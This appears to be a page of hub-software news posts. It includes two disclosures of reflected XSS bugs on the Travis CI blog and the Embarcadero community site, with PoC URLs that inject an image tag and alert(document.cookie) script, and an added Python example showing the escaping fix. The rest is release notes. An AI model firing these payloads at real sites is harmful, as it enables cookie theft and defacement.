
Travis CI blog XSS bug

Vulnerable page: https://blog.travis-ci.com/

PoC
https://blog.travis-ci.com/search?q="><img src=http://www.te-home.net/gallery/xssd_by_teamelite.png>

PoC
https://blog.travis-ci.com/search?q="><script>alert(document.cookie)</script>

You can either include any XSS code in the search input box, or request any XSS code directly using the GET method and the q parameter.



Note: This is a proof of concept and it doesn't reflect the views or interests of the above websites.
Posted by RoLex on 2018-02-24 22:54

Embarcadero community XSS bug

Vulnerable page: https://community.embarcadero.com/

PoC
https://community.embarcadero.com/blogs/blog-menu?search="><img src=http://www.te-home.net/gallery/xssd_by_teamelite.png>

PoC
https://community.embarcadero.com/blogs/blog-menu?search="><script>alert(document.cookie)</script>

You can either include any XSS code in the search input box, or request any XSS code directly using the GET method and the search parameter.



Note: This is a proof of concept and it doesn't reflect the views or interests of the above websites.
Posted by RoLex on 2018-02-24 13:47
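
Both posts above describe a search parameter (q, search) that is echoed back into the page unescaped. The following is an added example, not code from the posts or from the affected sites: it assumes the value is reflected into the value attribute of the search input, as the "> prefix of the PoCs suggests, and puts the raw rendering beside an escaped one with a parser-based check that can serve as a regression test. The template and all function names are hypothetical.

```python
import html
from html.parser import HTMLParser

# Hypothetical template: the search term is echoed into the input's value attribute.
FORM = '<form action="/search"><input type="text" name="q" value="{q}"></form>'


def render_unsafe(q: str) -> str:
    """'Before' form: raw query string placed in the attribute (reflected XSS)."""
    return FORM.format(q=q)


def render_safe(q: str) -> str:
    """Hardened form: escape &, <, > and both quote characters for attribute context."""
    return FORM.format(q=html.escape(q, quote=True))


class TagAudit(HTMLParser):
    """Records every element the parser sees and the value of the q input."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags = []
        self.q_value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        attrs = dict(attrs)
        if tag == "input" and attrs.get("name") == "q":
            self.q_value = attrs.get("value")


def audit(markup: str) -> TagAudit:
    parser = TagAudit()
    parser.feed(markup)
    parser.close()
    return parser


def injected_tags(markup: str) -> list:
    """Elements present beyond the template's own form and input."""
    return [t for t in audit(markup).tags if t not in ("form", "input")]


# Query value taken from the second PoC URL in the posts above.
SAMPLE_Q = '"><script>alert(document.cookie)</script>'
```

With escaping in place the parser sees only the template's own form and input, and the input's value round-trips to exactly what the user typed, so the search box still displays the original term.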

Verlihub Verlihub 1.1.0.0

Changes in 1.1.0.0
Commit log: https://github.com/verlihub/verlihub/commits/master

File information: Verlihub 1.1.0.0
Posted by verlihub on 2018-02-19 14:18

Ledokol Ledokol 2.9.5.70

Changes in 2.9.5.70
[ 63] Fixed: Operator list appearance after removing user with opkeyclass condition, report by KCAHDEP
[ 64] Added: CTM uptime with actions
[ 65] Added: More keywords to AVDB search server requests
[ 65] Added: Optional path parameter to avdetforce command
[ 66] Added: Command notification for custom nick change, request by KCAHDEP
[ 67] Added: Main chat rank prize as higher user class defined by configuration, idea by Foxtrot
[ 68] Added: Updated country code list after MaxMindDB names
[ 69] Added: Search and CTM uptime user message control, request by KCAHDEP

File information: Ledokol 2.9.5.70
Posted by ledokol on 2018-02-19 13:49

Verlihub Python Scripts Blacklist 1.2.3.2

Changes in 1.2.3.2
# 1.2.2.7 - Added country code translation to some messages
# 1.2.2.8 - Added "prox_quote" configuration to limit amount of public proxy lookups per day
# 1.2.2.9 - Added prioritization of public proxy and my lists
# 1.2.2.9 - Removed break on first match
# 1.2.2.9 - Added "prox_getasn" configuration to show GeoIP ASN information on proxy detection
# 1.2.2.9 - Added "extry_getasn" configuration to show GeoIP ASN information on exception lookup
# 1.2.3.0 - Added "myoff" and "exoff" commands to disable or enable items in my and exception lists
# 1.2.3.0 - Added results from my list to find action
# 1.2.3.0 - Added ASN check on connection
# 1.2.3.1 - Added "asn_block" configuration for space separated list of blocked AS numbers
# 1.2.3.1 - Added "asn_except" configuration for space separated list of excepted AS numbers
# 1.2.3.2 - Added "nick_skip" configuration for space separated list of users to skip proxy lookup

File information: Blacklist 1.2.3.2
Posted by vhpython on 2018-02-19 13:21